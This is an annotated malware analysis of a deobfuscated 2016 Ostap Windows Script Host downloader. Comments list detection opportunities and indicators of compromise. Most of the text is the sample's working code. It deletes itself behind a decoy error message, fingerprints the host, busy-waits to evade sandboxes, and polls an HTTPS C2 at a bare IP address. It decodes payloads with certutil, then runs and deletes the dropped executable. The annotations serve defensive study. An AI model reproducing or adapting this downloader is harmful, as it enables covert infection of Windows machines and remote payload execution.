2016 Ostap Deobfuscated (ostap.php)
// Analysis annotations for a deobfuscated Windows Script Host (JScript) downloader.
// It runs under wscript/cscript and relies on COM objects (WScript.Shell,
// Scripting.FileSystemObject, ADODB.Stream, Shell.Application, Msxml2.ServerXMLHTTP),
// not on browser or Node APIs. Behaviour visible in this listing, in order: delete the
// on-disk script and show a decoy message, derive a host identifier, busy-wait, poll an
// HTTPS C2 for a payload, drop it to %TEMP%, execute it, clean up, and exit.
// Detection opportunities from this listing alone: wscript.exe spawning certutil.exe with
// `-decode`; wscript.exe making an outbound TLS connection to a bare IP on port 4433;
// a script named adobe_update.js in the user's Startup folder; a .exe with a purely
// numeric name written to %TEMP% and deleted shortly after launch.
// The code is left exactly as published; only comments are added.
(function () {
// Lines of the form `pre_<word> = <number>` assign globals that are never read:
// obfuscation padding with no effect on behaviour (no `var`, so they leak as globals).
pre_opened4 = 0.637;
pre_weakly = 0.129;
pre_they9 = 733;
pre_idea = 0.951;
pre_worse = 371;
pre_here = 0.382;
pre_monster10 = 739;
pre_know3 = 0.302;
pre_doing = 0.5;
pre_hurled2 = 411;
pre_thats = 923;
pre_middle0 = 0.608;
pre_this = 0.796;
pre_fail = 0.347;
pre_windowsill = 0.656;
pre_about = 0.137;
pre_crowdedIt = 32;
pre_kinds10 = 0.191;
// Aliases for the WSH globals, presumably to defeat simple string matching on
// 'ActiveXObject' / 'WScript'.
var pre_known = ActiveXObject;
var pre_drop = WScript;
// WScript.Shell: process environment (COMPUTERNAME, HOMEPATH) and Exec().
var pre_voices = WScript.CreateObject('WScript.Shell');
var fso12 = new ActiveXObject('Scripting.FileSystemObject');
// ADODB.Stream is only needed for the binary (MZ) download path. Creation failure is
// ignored, so `fstream` may be undefined later; any resulting error is swallowed by the
// catch around the polling loop.
try {
var fstream = new ActiveXObject('ADODB.Stream');
} catch (e) {
}
var oShell = new pre_known('Shell.Application');
// NOTE(review): `ExpandEnvironmentStrings` is not a bare global in WSH JScript; it is a
// method of WScript.Shell. As published this line would throw -- most likely an artefact
// of the deobfuscation pass rather than the original sample's code.
var temp12 = ExpandEnvironmentStrings('%TEMP%');
var char123 = '\\';
// Drop paths: %TEMP%\<N>.exe for the executable and %TEMP%\<N>.xmp for a text (base64)
// payload. Math.floor(Math.random() * 100 + 1) gives 1..100; the two N are drawn
// independently.
var pre_imagery = temp12 + char123 + Math.floor(Math.random() * (50 + 50) + 1) + '.exe';
var pre_dawn = temp12 + char123 + Math.floor(Math.random() * (50 + 50) + 1) + '.xmp';
// HTTP client used for C2 polling (ServerXMLHTTP is WinHTTP-based).
var pre_right = new pre_known('Msxml2.ServerXMLHTTP');
// Persistence filename. Shell.Application NameSpace(7) (3+2+1+1) is the user's Startup folder.
var body12 = char123 + 'adobe_update.js';
var startupFolder = oShell['NameSpace'](3 + 2 + 1 + 1);
var flagme = false;
// Redeclares the padding global from above as a local; never read afterwards.
var pre_opened4 = false;
// pre_garden is reused: first as the busy-wait counter, later as the launch-result
// code / child process id.
var pre_garden = 1;
// 32-bit hash of the host identifier, sent to the server as `uid`.
var hashhere = 0;
// pre_either10 is reused: loop index for the hash, then the `ver` value (10 or 20).
var pre_either10 = 0;
// Result of the last payload launch (0 = nothing launched yet), sent as `out`.
var out123 = 0;
// PE header magic used to recognise an executable payload.
var mz12 = 'MZ';
var empty12 = null;
var pre_head = null;
var objFile = null;
var filets = null;
var scrpath = pre_drop['ScriptFullName'];
// Expected persistent location: <Startup>\adobe_update.js. No copy of the script to this
// path is visible in this listing.
var autor = startupFolder.Self.Path + body12;
var uidhere = autor;
var cmd12 = '/c start ';
// Argument prefix for `certutil -decode <in> <out>`, used as a base64 decoder (LOLBin).
var pre_concentrated = '-decode ';
// C2 endpoint (IoC from this listing): HTTPS to a bare IP on port 4433, path /MIKE/ostap.php.
var pre_written = 'https://217.29.58.174:4433/MIKE/ostap.php?add=fty7ygvhuijhbvfdew2erfvghu8ujhvfcdxe4r5t6y';
// When not running from the Startup path: delete the script file that is executing (the
// script engine keeps running from memory), show a decoy "corrupted document" message
// (a dialog under wscript.exe), then wait 3 s.
if (scrpath != autor && flagme == false) {
flagme = true;
fso12['DeleteFile'](scrpath);
pre_drop['echo']('The document is corrupted and cannot be opened');
pre_drop['Sleep'](3000);
}
// Host identifier = Startup script path + COMPUTERNAME, hashed as h = h*31 + c
// ((h << 5) - h == h * 31). JScript bitwise operators produce a signed 32-bit int, so the
// value stays in int32 range; Math.abs() is applied when it is sent.
uidhere = uidhere + pre_voices['Environment']('PROCESS')['Item']('COMPUTERNAME');
for (pre_either10 = 0; pre_either10 < uidhere.length; pre_either10++) {
hashhere = (hashhere << 5) - hashhere + uidhere['charCodeAt'](pre_either10) & 4294967295;
}
// `ver` = 20 when HOMEPATH starts with \Users\ (Vista-and-later profile layout), else 10.
if (pre_voices['Environment']('PROCESS')['Item']('HOMEPATH')['indexOf'](char123 + 'Users' + char123) == 0) {
pre_either10 = 20;
} else {
pre_either10 = 10;
}
// Outer loop: counts to 300,000,000 (1*30000*1*10000*1) before any network activity -- a
// CPU-bound delay consistent with sandbox / short-analysis evasion. When the inner loop
// exits, the `break` at the bottom ends the script.
while (true) {
pre_garden = pre_garden + 1;
if (pre_garden == 1 * 30000 * 1 * 10000 * 1) {
// Polling loop: one synchronous GET per iteration, 60 s between iterations, all errors
// swallowed by the catch below.
while (true) {
try {
// Option 3 on ServerXMLHTTP is SXH_OPTION_SELECT_CLIENT_SSL_CERT; the effect of passing
// 'MSXML' here is not clear from the listing.
pre_right['setOption'](1 + 2, 'MSXML');
// Query string: random cache-buster, uid=<abs(hash)>, out=<last launch result>, ver=<10|20>.
// Third argument false = synchronous request.
pre_right['open']('GET', pre_written + '&' + Math['floor'](Math['random']() * 100 + 1) + '&uid=' + Math['abs'](hashhere) + '&out=' + out123 + '&ver=' + pre_either10, false);
pre_right['send']();
// 25 + 25 + 150 + 0 == 200.
if (pre_right['status'] == 25 + 25 + 150 + 0) {
// A payload was already launched and its result reported: stop polling
// (falls through to the outer `break`).
if (out123 > 0)
break;
// Remove leftovers from a previous attempt.
if (fso12['FileExists'](pre_imagery))
fso12['DeleteFile'](pre_imagery);
if (fso12['FileExists'](pre_dawn))
fso12['DeleteFile'](pre_dawn);
empty12 = pre_right['responseText'];
// Response starts with 'MZ': raw PE, written as binary (Type = 1) via ADODB.Stream
// directly to <N>.exe.
if (empty12['substring'](0, 2) == mz12) {
fstream['Open']();
fstream['Type'] = 1;
fstream['Write'](pre_right['responseBody']);
fstream['Position'] = 0;
fstream['SaveToFile'](pre_imagery);
fstream['Close']();
} else {
// Otherwise, if the body exceeds 1024 characters, it is treated as encoded text: saved
// to <N>.xmp and decoded to <N>.exe by `certutil -decode`, run with a hidden window (0).
if (empty12.length > 1024) {
objFile = fso12['CreateTextFile'](pre_dawn, true, false);
objFile['WriteLine'](empty12);
objFile['Close']();
pre_concentrated = pre_concentrated + pre_dawn + ' ' + pre_imagery;
oShell['ShellExecute']('certutil', pre_concentrated, '', 'open', 0);
}
}
pre_drop['Sleep'](5000);
// Nothing was dropped (short response, or the decode did not produce a file): poll again.
if (!fso12['FileExists'](pre_imagery))
continue;
// Check that the dropped file starts with the PE magic before running it.
filets = fso12['GetFile'](pre_imagery)['OpenAsTextStream'](1);
if (filets['ReadLine']()['substring'](0, 2) == mz12) {
filets['Close']();
pre_garden = 1;
// Launch attempts in order: WScript.Shell.Exec (records the child ProcessID),
// Shell.Application.ShellExecute with a hidden window (result 2), then
// `%COMSPEC% /c start <exe>` (result 3). The result is reported as `out` on the next poll.
try {
pre_head = pre_voices['Exec'](pre_imagery);
pre_garden = pre_head['ProcessID'];
} catch (e) {
try {
oShell['ShellExecute'](pre_imagery, '', '', 'open', 0);
pre_garden = 2;
} catch (e) {
cmd12 = cmd12 + pre_imagery;
oShell['ShellExecute']('%COMSPEC%', cmd12, '', 'open', 0);
pre_garden = 3;
}
}
out123 = pre_garden;
// Anti-forensics: delete the running script file (again), wait 5 s, then delete the
// dropped executable. The .xmp text file is not removed here.
if (fso12['FileExists'](pre_drop['ScriptFullName']))
fso12['DeleteFile'](pre_drop['ScriptFullName']);
pre_drop['Sleep'](5000);
if (fso12['FileExists'](pre_imagery))
fso12['DeleteFile'](pre_imagery);
continue;
}
filets['Close']();
}
} catch (e) {
// Every failure (network, COM, file I/O, undefined `fstream`) is silently ignored and
// retried after the 60 s sleep below.
}
pre_drop['Sleep'](10000 * 6);
}
break;
}
}
// More obfuscation padding: these globals are never read.
pre_nothing10 = undefined;
pre_sank = undefined;
pre_those = undefined;
pre_Guys = undefined;
pre_problem8 = undefined;
pre_snotnosesAt0 = undefined;
pre_them = undefined;
pre_burns = undefined;
pre_cant = undefined;
pre_little = undefined;
pre_snow5 = undefined;
pre_believe = undefined;
pre_hell8 = undefined;
pre_cant = undefined;
pre_other2 = undefined;
pre_because = undefined;
}());